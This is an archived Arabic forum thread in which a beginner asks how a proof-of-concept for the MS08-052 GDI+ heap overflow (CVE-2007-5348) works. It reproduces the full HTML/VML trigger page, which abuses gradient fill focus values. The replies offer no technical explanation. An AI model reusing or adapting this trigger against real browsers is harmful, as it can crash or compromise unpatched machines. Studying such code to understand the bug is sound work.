الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

سؤال عن نتائج هذا البرنامج

بدأه clear في 8 مارس 2009 · 5 رد · 875 مشاهدة · في قسم البرمجة بــ Javascript
مشاركة: واتساب X فيسبوك تيليجرام
#1 صاحب الموضوع

السلام عليكم:

انا اريد ان استكشف عمل نقطة الضعف رقم (cve-2007-5348)

في برامج مايكروسوفت، طبعا انا قليل خبرة بالبرمجة وصار عندي الكثير من الاسئلة بعد بحثي في هذا الموضوع واتمنى منكم المساعدة بما تستطيعون

طبعا هنا نقطة الضعف ملخصها انها تمكن الهاكر من الدخول على الجهاز من بعد وتنفيذ الاوامر عن بعد

البرنامج بحسب بحثي يتكون من قسمين : القسم الاول هو الكود الرئيسي المقروء والقسم الثاني هو مايسمى بالـ بيلود والذي يستخدمه الهاكر للحصول على الكوماند لاين برومبت.

انا بصراحة جديد على هذه الساحة ولذلك طلبت المساعدة.

طبعا السورس كود موجود عندي وسأضعه في الأسفل (لأن الموقع لم يسمح لي ان ارفعه في ملف تكست ولا اعلم لماذا) ولكن مالا اعلمه انه هل البيلود مخفي داخل السورس كود ام انه مستقل؟

طبعا انا اعتقد ان السورس كود مكتوب بلغة جافا سكربت واتمنى من الاخوة الخبيرين ان يعطوني بالتفصيل مالذي يفعله هذا البرنامج مع العلم ان الهدف منه هو انه يعمل هيب بفر اوفر فلو ولكني اريد تفصيل العملية مالذي يحصل بالضبط لأني اريد ان افهم البرنامج كاملا

الكود هو الاتي:


<head>
<STYLE>
ef\:* { behavior: url(#default#VML); }
</STYLE>
</head>

<body>

<pre>
================================================
MS08-052: GDI+ Vulnerability
------------------------------------------------
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180

Credit:
John Smith,
Evil Fingers

Link: http://www.evilfingers.com/patchTuesday/MS...lnerability.txt
================================================
</pre>

<XML:NAMESPACE ns="urn:schemas-microsoft-com:vml" prefix="ef">


<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'>
<ef:fill type="gradientCenter";></ef:fill>
</ef:oval>

<script>
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');

ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
</script>
</body>
</html>
<html>

تم تعديل هذه المشاركة بواسطة طارق إبراهيم في 9 مارس 2009 في 10:02

#2

ها يا شباب شفت الموضوع قرء 14 مرة ولا أحد جاوب

اذا فيه احد يشوف ان الموضوع محتاج توضيح اكثر في نقطة معينة فليكتب سؤاله وانا احاول ان اجاوب عليه بما اعرف

والمشكلة ان وقتي محدود لا زم احصل على الاجوبة وانا الان انتظر ردودكم وفي نفس الوقت ابحث عن المعلومات وبصراحة صارت عندي اسئلة كثيرة الان ايضا ولكن لا أريد ان اشتت الموضوع

اذا انا وجدت الخبرا ء الذين يستطيعون الرد سوف ازيد واعمق النقاش معهم فالله يخليكم لا تبخلون بالمعلومة (اقصد من يمتكلها طبعا) ولا تترددون بطلب اي توضيح وانا حاضر بما استطيع

والشكر موصول لكم والسلام عليكم.

#3

كنت اتمناء اني افيدك بس خبرتي بسيطه بالمجال

لكن تستطيع البحث في المجموعات الاجنبية التي تتحدث عن web browser security

ففي الاخير كود الجافا ياتي ليطبق ثغرة او مكان شاغر لثغرة تسمح بذالك فيقوم كتابة الاستغلال بالجافا سكربت

#4

مشكور اخوي اسماعيل على الرد

انا كتبت مشاركتي في هذا المنتدى بصراحة بعد مشورة احد الشباب علي بأن هذا المنتدى نشيط والشباب هنا (الخبراء منهم يعني) اكيد انهم راح يفيدوني وما بيقصرون

بس بصراحة الى الان اللي شفت انو فقط الشباب يدخلون يقرؤون الموضوع ويمشون بدون مايردون ولو بمعلومات بسيطة ممكن تفيدني في البحث اكثر

عموماُ الله يعطيك العافية وما قصرت وإن شاء الله الشباب مايقصرون بعد.. شاكرين ومقدرين

#5

السلام عليكــم ورحمـة الله وبركاتــة ،،

كيف حالك اخوي ان شاء بخير؟

ولا يهمك حبيب قلبي انا عندي خلفية بسيطة في الجافاسكربت

لكن انا اعرف واحد من الشباب له خبرة في هذا المجال وسوف اسئل عن موضوعك وان شاء الله

القى حل عندة وراح احط الحل هناا عشان الكل يستفيد

وسيتم الرد في اقرب وقت

سبحان الله وبحمدة سبحان الله العظيم

النور في قلبي وقلبي في يديْ ربّي**** .. وربّي ناصري ومعيني

سأعيش معتصماً بحبل عقيدتي **** وأموت مبتسماً ليحيا ديني

#6

حياك الله عزيزي السنتور انا انتظرت ردك عزيزي صار لي كم يوم انتظر لكن شكلك انشغلت عني

ان شاء الله انك خصلت الجواب ترى اخوي انا انتظرك :resentful:

اتمنى انك تحط الجواب في اقرب فرصة والله يعطيك الف عافية على مجهوداتك

مواضيع مشابهة